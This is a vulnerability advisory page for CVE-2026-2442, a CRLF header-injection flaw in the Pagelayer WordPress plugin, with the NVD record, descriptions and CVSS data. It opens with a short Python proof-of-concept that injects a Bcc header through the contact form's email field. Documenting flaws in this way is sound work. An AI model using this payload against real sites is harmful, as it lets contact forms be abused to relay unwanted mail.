CVE-2026-2442

import requests target = "http://example.com/wp-admin/admin-ajax.php" # Payload injecting CRLF sequences to add a Bcc header # %0D is CR, %0A is LF injection_payload = "[email protected]%0D%0ABcc: [email protected]" data = { "action": "pagelayer_contact_form", "form_data": { "name": "Test User", "email": injection_payload, "message": "This is a test." } } response = requests.post(target, data=data) print(f"Response Status: {response.status_code}") # If successful, an email is sent to [email protected]

{"cve": {"id": "CVE-2026-2442", "sourceIdentifier": "[email protected]", "published": "2026-03-28T10:16:30.980", "lastModified": "2026-04-24T16:36:24.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 2.0.7. This is due to the contact form handler performing placeholder substitution on attacker-controlled form fields and then passing the resulting values into email headers without removing CR/LF characters. This makes it possible for unauthenticated attackers to inject arbitrary email headers (for example Bcc / Cc) and abuse form email delivery via the 'email' parameter granted they can target a contact form configured to use placeholders in mail template headers."}, {"lang": "es", "value": "El Page Builder: Pagelayer – plugin constructor de sitios web de arrastrar y soltar para WordPress es vulnerable a la Neutralización Incorrecta de Secuencias CRLF ('Inyección CRLF') en todas las versiones hasta la 2.0.7, inclusive. Esto se debe a que el gestor del formulario de contacto realiza la sustitución de marcadores de posición en campos de formulario controlados por el atacante y luego pasa los valores resultantes a las cabeceras de correo electrónico sin eliminar los caracteres CR/LF. Esto hace posible que atacantes no autenticados inyecten cabeceras de correo electrónico arbitrarias (por ejemplo, Cco / Cc) y abusen de la entrega de correo electrónico del formulario a través del parámetro 'email', siempre que puedan apuntar a un formulario de contacto configurado para usar marcadores de posición en las cabeceras de la plantilla de correo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3464204/pagelayer", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce101aad-10a3-4a8c-9f4a-0e38e35b4dab?source=cve", "source": "[email protected]"}]}}